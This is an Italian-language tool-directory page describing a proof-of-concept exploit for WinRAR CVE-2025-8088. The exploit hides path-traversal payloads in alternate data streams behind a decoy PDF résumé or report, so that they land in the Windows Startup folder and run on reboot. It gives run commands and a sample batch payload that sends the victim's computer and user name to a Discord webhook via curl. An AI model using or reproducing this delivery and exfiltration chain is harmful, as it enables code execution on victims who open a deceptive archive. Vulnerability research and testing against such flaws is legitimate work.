Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
best-CVE-2025-8088 — Sfruttamento della vulnerabilità CVE in Winrar precedente alla versione 7.13 utilizzando multipli flussi ADS su un singolo file (Implementazione PDF personalizzata) | Kitploit
Strumenti/GitHubGitHub/pentestfunctions/best-cve-2025-8088
Analisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed TeamingSviluppo PayloadBinary Exploitation
GitHubpentestfunctions/best-cve-2025-8088

best-CVE-2025-8088

Sfruttamento della vulnerabilità CVE in Winrar precedente alla versione 7.13 utilizzando multipli flussi ADS su un singolo file (Implementazione PDF personalizzata)

Vedi Repository
1131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8088 Exploit WinRAR 🔓

Un exploit proof-of-concept per la vulnerabilità di WinRAR (CVE-2025-8088) che colpisce le versioni 7.12 e inferiori. Questo strumento crea un archivio RAR malevolo che incorpora payload in Alternate Data Streams (ADS) con path traversal, potenzialmente portando all'esecuzione di codice arbitrario.

  • Il problema con molti altri è che non incorporano più stream ADS, richiedendo o fortuna per avere il giusto path traversal o conoscere il nome utente/directory di estrazione esatti.

🚀 Come Funziona

  1. Crea un Documento Esca 📄 - Genera un PDF dall'aspetto professionale (CV o report di pentest)
  2. Incorpora Multipli Stream ADS 🔄 - Allega stream di payload con diverse profondità di path traversal
  3. Manipola le Intestazioni RAR ⚙️ - Modifica la struttura dell'archivio per sfruttare la vulnerabilità di path traversal
  4. Rilascia Payload in Avvio 📂 - Tenta di scrivere il payload nella cartella di avvio di Windows quando viene estratto

🛠️ Utilizzo

root@kitploit:~
# Clona il repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# Installa le dipendenze
pip install reportlab

# Esegui l'exploit
python CVE-2025-8088.py

✏️ Personalizzazione del Payload

Modifica il payload per chiamare un webhook di Discord:

root@kitploit:~
# Sostituisci la variabile PAYLOAD nello script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Estratto su %COMPUTERNAME% da %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Sostituisci YOUR_DISCORD_WEBHOOK_URL con l'URL del tuo webhook effettivo.

🔄 Flusso di Esecuzione

  1. La vittima estrae il RAR con WinRAR vulnerabile (≤7.12)
  2. Il payload viene scritto nella cartella di avvio:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Al prossimo riavvio ➡️ il payload viene eseguito automaticamente

📋 Requisiti

  • Sistema operativo Windows 🪟
  • Python 3.x 🐍
  • WinRAR installato
  • Libreria ReportLab (pip install reportlab)
Scarica lo strumento